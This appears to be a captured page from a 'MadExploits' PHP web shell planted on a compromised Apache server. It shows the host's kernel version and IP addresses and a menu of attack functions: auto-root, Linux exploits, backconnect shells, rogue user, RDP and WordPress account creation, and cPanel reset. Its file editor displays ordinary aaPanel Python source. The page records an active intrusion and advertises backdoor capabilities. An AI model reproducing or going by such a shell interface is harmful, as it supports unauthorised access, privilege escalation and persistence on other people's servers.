Linux ip-172-26-2-223 5.4.0-1018-aws #18-Ubuntu SMP Wed Jun 24 01:15:00 UTC 2020 x86_64
Apache
: 172.26.2.223 | : 3.129.89.50
Cant Read [ /etc/named.conf ]
8.1.13
www
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
www /
server /
panel /
mod /
project /
push /
[ HOME SHELL ]
Name
Size
Permission
Action
__pycache__
[ DIR ]
drwxr-xr-x
__init__.py
0
B
-rw-r--r--
msgconfMod.py
2.26
KB
-rw-r--r--
taskMod.py
9.55
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : msgconfMod.py
# coding: utf-8 # ------------------------------------------------------------------- # aapanel # ------------------------------------------------------------------- # Copyright (c) 2015-2017 aapanel(http:#bt.cn) All rights reserved. # ------------------------------------------------------------------- # Author: baozi <baozi@bt.cn> # ------------------------------------------------------------------- # 新告警通道管理模块 # ------------------------------ from mod.base.msg import SenderManager, update_mod_push_msg from mod.base.push_mod import SenderConfig from mod.base import json_response import public update_mod_push_msg() class main(SenderManager): @staticmethod def wx_account_auth(get=None): return WeChatAccountMsg.get_auth_url() @staticmethod def unbind_wx_account(get): try: sender_id = get.sender_id.strip() except AttributeError: return json_response(status=False, msg="Parameter error") conf = SenderConfig().get_by_id(sender_id) if not conf: return json_response(status=False, msg="No binding information was found") res = WeChatAccountMsg.unbind(conf["data"]["id"]) public.WriteFile(WeChatAccountMsg.need_refresh_file, "") return res def set_default_sender(self, get): try: try: sender_id = get.sender_id.strip() sender_type = get.sender_type.strip() except AttributeError: return json_response(status=False, msg="Parameter error") sc = SenderConfig() change = False print("SenderConfig",sc.config) for conf in sc.config: if conf["sender_type"] == sender_type: is_original = conf.get("original", False) if conf["id"] == sender_id: change = True conf["original"] = True else: conf["original"] = False sc.save_config() if change: self.set_default_for_compatible(sc.get_by_id(sender_id)) return json_response(status=True, msg="Successfully set") except Exception as e: return json_response(status=False, msg=e)
Close